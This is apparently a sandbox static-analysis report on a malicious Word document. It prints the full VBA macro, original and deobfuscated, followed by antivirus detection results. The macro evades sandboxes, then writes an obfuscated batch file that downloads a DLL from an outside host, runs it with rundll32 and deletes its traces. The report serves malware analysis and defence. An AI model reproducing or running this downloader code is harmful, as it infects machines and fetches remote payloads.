popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_close()
On Error Resume Next
Set WshShell = CreateObject("Wscript.Shell")
temppath = WshShell.ExpandEnvironmentStrings("%localappdata%")
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(temppath & "\UjdUhsbsjfU.txt") Then
End
Else
End If
fso.CreateTextFile (temppath & "\UjdUhsbsjfU.txt")
On Error Resume Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem", , 48)
For Each objitem In colItems
    memory = objitem.TotalVisibleMemorySize
   users = objitem.RegisteredUser
   If memory < 5000000 Then
qtyall = qtyall + 1
Else
End If
Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objitem In colItems
    If objitem.Name = "tcpdum" + "p.exe" Then
       Item = Item + "_tcp" + "dump.e" + "xe"
End If
   If objitem.Name = "wireshark.ex" + "e" Then
       Item = Item + "_wire" + "shark.exe"
End If

   If objitem.Name = "pythonw.e" + "xe" Then
       Item = Item + "_python" + "w.exe"
End If
   If objitem.Name = "Vmto" + "olsd.e" + "xe" Then
       Item = Item + "_Vmtool" + "sd.exe"
End If
Next
If qtyall > 0 Then
End
Else
Call erjan
End If
End Sub

Sub erjan()
PfleIkmImw = PfleIkmImw + "@echo off" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""serv=C:\Users\%username%\AppData\Local\Temp""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""curl=C:\Windows\System32\curl.exe""" & vbCrLf
memo = "C" & Chr(58) & "\Users" & Chr(92)
PfleIkmImw = PfleIkmImw + "set ""fold=C:\Users\%username%\AppData\Local\Microsoft\Windows\History""" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "mkdir load" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd load " & vbCrLf
ise = CreateObject("Wscript.Network").UserName
PfleIkmImw = PfleIkmImw + "set ""fold2=C:\Users\%username%\AppData\Local\Microsoft\Windows\History\load""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""namex=%fold2%\%random%ji%random%.dll""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""namex2=%fold2%\%random%jis%random%.dll"" " & vbCrLf
PfleIkmImw = PfleIkmImw + "if exist %curl% (goto curlload) else (goto bitsadmin)" & vbCrLf
PfleIkmImw = PfleIkmImw + ":curlload" & vbCrLf
laz = Chr(92) & "appdata" & Chr(92) & "local\"
PfleIkmImw = PfleIkmImw + "curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
PfleIkmImw = PfleIkmImw + ":bitsadmin" & vbCrLf
PfleIkmImw = PfleIkmImw + "%PUBLIC:~-1%%PUBLIC:~5,-9%%TMP:~6,1%tut%APPDATA:~-3,1%l.exe -urlcache%CommonProgramW6432:~-6,1%-split -f http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng ""%namex%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
fre = "tem" + "p\"
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
PfleIkmImw = PfleIkmImw + ":delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold2%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "rd /s /q ""%fold2%"" 2>NUL" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%serv%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.vbs" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.bat" & vbCrLf
PfleIkmImw = PfleIkmImw + "echo.>""%~f0""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del ""%~f0"" /q" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
opossujm = memo + ise + laz + fre
Set Oalfgenwjl = CreateObject("Scripting.FileSystemObject")
nameeeee = opossujm & Oalfgenwjl.GetTempName & ".bat"
Set stex = Oalfgenwjl.CreateTextFile(nameeeee, True)
stex.writeline PfleIkmImw
stex.Close
Set opaluba = CreateObject("wscript.shell")
opaluba.Run Chr(34) & nameeeee & Chr(34), 0, True
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_close()
On Error Resume Next
Set WshShell = CreateObject("Wscript.Shell")
temppath = WshShell.ExpandEnvironmentStrings("%localappdata%")
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(temppath & "\UjdUhsbsjfU.txt") Then
End
Else
End If
fso.CreateTextFile (temppath & "\UjdUhsbsjfU.txt")
On Error Resume Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem", , 48)
For Each objitem In colItems
    memory = objitem.TotalVisibleMemorySize
   users = objitem.RegisteredUser
   If memory < 5000000 Then
qtyall = qtyall + 1
Else
End If
Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objitem In colItems
    If objitem.Name = "tcpdum" + "p.exe" Then
       Item = Item + "_tcp" + "dump.e" + "xe"
End If
   If objitem.Name = "wireshark.ex" + "e" Then
       Item = Item + "_wire" + "shark.exe"
End If

   If objitem.Name = "pythonw.e" + "xe" Then
       Item = Item + "_python" + "w.exe"
End If
   If objitem.Name = "Vmto" + "olsd.e" + "xe" Then
       Item = Item + "_Vmtool" + "sd.exe"
End If
Next
If qtyall > 0 Then
End
Else
Call erjan
End If
End Sub

Sub erjan()
PfleIkmImw = PfleIkmImw + "@echo off" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""serv=C:\Users\%username%\AppData\Local\Temp""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""curl=C:\Windows\System32\curl.exe""" & vbCrLf
memo = "C" & Chr(58) & "\Users" & Chr(92)
PfleIkmImw = PfleIkmImw + "set ""fold=C:\Users\%username%\AppData\Local\Microsoft\Windows\History""" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "mkdir load" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd load " & vbCrLf
ise = CreateObject("Wscript.Network").UserName
PfleIkmImw = PfleIkmImw + "set ""fold2=C:\Users\%username%\AppData\Local\Microsoft\Windows\History\load""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""namex=%fold2%\%random%ji%random%.dll""" & vbCrLf
PfleIkmImw = PfleIkmImw + "set ""namex2=%fold2%\%random%jis%random%.dll"" " & vbCrLf
PfleIkmImw = PfleIkmImw + "if exist %curl% (goto curlload) else (goto bitsadmin)" & vbCrLf
PfleIkmImw = PfleIkmImw + ":curlload" & vbCrLf
laz = Chr(92) & "appdata" & Chr(92) & "local\"
PfleIkmImw = PfleIkmImw + "curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
PfleIkmImw = PfleIkmImw + ":bitsadmin" & vbCrLf
PfleIkmImw = PfleIkmImw + "%PUBLIC:~-1%%PUBLIC:~5,-9%%TMP:~6,1%tut%APPDATA:~-3,1%l.exe -urlcache%CommonProgramW6432:~-6,1%-split -f http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng ""%namex%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
fre = "tem" + "p\"
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
PfleIkmImw = PfleIkmImw + ":delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold2%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "rd /s /q ""%fold2%"" 2>NUL" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%serv%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.vbs" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.bat" & vbCrLf
PfleIkmImw = PfleIkmImw + "echo.>""%~f0""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del ""%~f0"" /q" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
opossujm = memo + ise + laz + fre
Set Oalfgenwjl = CreateObject("Scripting.FileSystemObject")
nameeeee = opossujm & Oalfgenwjl.GetTempName & ".bat"
Set stex = Oalfgenwjl.CreateTextFile(nameeeee, True)
stex.writeline PfleIkmImw
stex.Close
Set opaluba = CreateObject("wscript.shell")
opaluba.Run Chr(34) & nameeeee & Chr(34), 0, True
End Sub
[Content_Types].xml
/L[E'9
_rels/.rels
word/document.xml
4H'>Lp
word/_rels/document.xml.rels
X=c+(\
word/vbaProject.bin
Qwg2%hn
KI1_!Y
k4#JKe6
s7<=?v
Yi[aaa+{
J#/<W0
<k-aSL
word/theme/theme1.xml
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
ij;7hmk?
fixNq*
word/settings.xml
z*T}vbC
word/styles.xml
/oR&dD
v25I%D$
eR*Etlm
,5DuIm
word/webSettings.xml
]?cv0$G
word/fontTable.xml
V}A>NH
Q]Qi4/
docProps/core.xml
Yu~Vr[p
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.Emooo.4!c
Elastic malicious (high confidence)
DrWeb modification of W97M.Suspicious.1
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-VBA.Save.Obfuscated
K7AntiVirus Clean
BitDefender VB.Heur.EmoooDldr.2.D21F479B.Gen
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
Alibaba TrojanDownloader:VBA/Obfuscation.A
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur.EmoooDldr.2.D21F479B.Gen
Rising Clean
Ad-Aware VB.Heur.EmoooDldr.2.D21F479B.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.mc
FireEye VB.Heur.EmoooDldr.2.D21F479B.Gen
Emsisoft VB.Heur.EmoooDldr.2.D21F479B.Gen (B)
SentinelOne Static AI - Suspicious OPENXML
Avast-Mobile Clean
Jiangmin Clean
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit VB.Heur.EmoooDldr.2.D21F479B.Gen
ViRobot Clean
ZoneAlarm Clean
GData VB.Heur.EmoooDldr.2.D21F479B.Gen
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.Dropper.Gen
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.